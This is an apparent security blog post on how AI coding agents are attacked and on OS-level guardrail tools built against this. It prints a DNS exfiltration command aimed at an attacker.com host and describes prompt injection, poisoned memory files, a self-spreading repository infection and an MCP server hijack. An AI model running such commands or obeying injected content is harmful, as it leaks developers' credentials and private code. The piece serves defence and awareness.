The Invisible Attack Surface of AI Coding Agents
Your AI coding agent has filesystem access, network access, and subprocess control. Most developers know this. What fewer realize is how little visibility they have into what those agents actually do — and how creatively attackers are exploiting the gap.
Three documented attack patterns reveal a systemic problem.
CVE-2025-55284: DNS Exfiltration via Prompt Injection
A prompt injection attack can trick Claude Code into running:
ping $(base64 -d <<< <encoded-credentials>).attacker.comThis sends your API keys out over DNS — completely invisible to any HTTPS-layer proxy. Your network monitoring sees nothing because DNS queries aren't HTTPS. This attack doesn't touch the API layer at all. It exploits the agent's OS-level tool execution.
SpAIware: Poisoning AI Memory Files
A malicious prompt can inject content into an AI agent's memory files (e.g., ~/.claude/memory.json). Every future session silently exfiltrates data before doing any work. The injection point is a local file, not a network request. No existing network proxy catches this.
AgentHopper: The Silent Repo Infector
An AI agent reads a malicious repository, injects payloads into local source files, and git-pushes. The next developer clones and their AI agent gets infected. No single event looks alarming:
Cross-event correlation is the only way to detect this pattern. Most tools don't have it.
Why Network Proxies Can't Help
Every existing security tool — CodeGate, Pipelock, Sysdig's agent security product — sits in the network path and inspects API calls. That architecture can't see file reads, subprocess spawning, or DNS exfiltration. It can't monitor what the AI writes to its own memory directories.
The attack surface isn't the API layer. It's the OS.
What's Emerging: OS-Level Guardrails
A new category of tools is emerging to address exactly this gap. Vectimus uses AWS's Cedar policy language to intercept every tool call — shell commands, file reads/writes, MCP calls, git pushes — before execution. Policies are evaluated locally in under 10ms with zero network calls. Every decision produces an Ed25519-signed receipt for auditability.
Agent Shield (macOS) watches AI coding tools at the FSEvents level, monitoring subprocess trees and network activity, with SpAIware detection on AI memory directories.
The key architectural shift: move from network-layer inspection to OS-layer interception. You can't inspect your way out of a filesystem problem.
The MCP Server Threat
CVE-2025-6514 compromised 437,000+ developer environments through a malicious MCP OAuth proxy. The GitHub MCP server was hijacked via a crafted GitHub issue to exfiltrate private repo data. With tools like Vectimus, MCP servers can be blocked by default and allowlisted per-project with input inspection — before a compromised server ever executes.
For Technical Founders and Builders
If you're shipping AI-assisted tools or using agents in your stack, ask your security tooling vendor:
- Can you see file reads, not just API calls?
- Do you monitor what the agent writes to its own memory directories?
- Can you detect cross-event sequences (read → write → network → push)?
- Do you have signed receipts for every tool call decision?